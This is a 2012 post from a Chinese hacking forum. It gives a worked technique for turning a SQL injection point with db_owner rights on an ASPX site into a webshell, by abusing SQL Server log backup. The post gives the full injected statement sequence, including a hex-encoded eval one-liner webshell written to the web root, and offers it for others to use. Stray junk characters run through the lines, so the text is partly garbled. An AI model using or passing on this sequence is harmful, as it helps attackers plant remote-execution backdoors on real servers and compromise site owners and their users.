找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2235|回复: 0
打印 上一主题 下一主题

关于aspx环境下log备份的一些思考

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:57:25 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
最近在看个网站的时候,aspx的字符型注点,db_owner权限,但是不支持asp,常见的方法是log备份asp,这次我们要备份aspx了(在这只讨论备份)。
& W1 }9 u! [& \( }但是直接写一句话虽然可以备份成功,但是执行时会报错,因此直接备份的一句话是无法执行的。1 v8 y* N1 p7 m+ _/ K$ h# ?
经过查找资料和本人测试发现,利用ie备份的时候,insert时,向表中插入内容,都是重复插入3条数据(ie6,ie8均如此),因此导致执行时出错;利用查询分析器insert的时候,只插入一条数据,因此不会报错,所以一句话成功执行。
8 l0 C) O" ^) p% W" `0 Z9 H经测试,备份如下格式:空格一句话空格、<br>一句话<br>时,有一定概率可以成功。不知道是什么原因,特来论坛请教,望高手解惑。" N) F1 Q' y( O6 ~, w  y- x8 P" x8 Q: k
+ }! P; U6 ]8 a& ]5 F" E" O; B
--------------------------------------------------------------. I: v4 l3 i3 E9 I7 ], n% Z! e
今天又试了下,发现直接备份有时候也可以成功,晕死了,为防止备份时插入多条内容导致出错,2 ]+ Y9 h$ [6 A
自己修改备份语句如下:5 O  S2 n8 ^8 R3 J) P% R
Drop table cmd;--
' p" y* ]" M$ X4 f" p! a& ialter database db_test set RECOVERY FULL;--# m6 J% B- b" k( K
create table cmd (a image,id int IDENTITY (1,1)); --添加了个自动编号的字段5 g9 ]9 y& ]7 m* ^
backup log db_test to disk = 'c:\bak' with init;--
( c  w9 i& @* K/ |% _insert into cmd (a) values(0x3C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B227A225D2C22756E7361666522293B253E);--
3 ^9 c! T5 _1 l: H/ D. K2 V( jdelete from cmd where id>1;--删除id>1的数据
' P$ \2 Q1 Q" ?8 q' ?. j6 N) O2 nbackup log db_test to disk = 'e:\webroot\test.aspx';--  V' V6 D$ z5 K0 d7 W9 L
Drop table cmd;--+ d% G3 X$ l! [% [, p
希望对大家有用。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表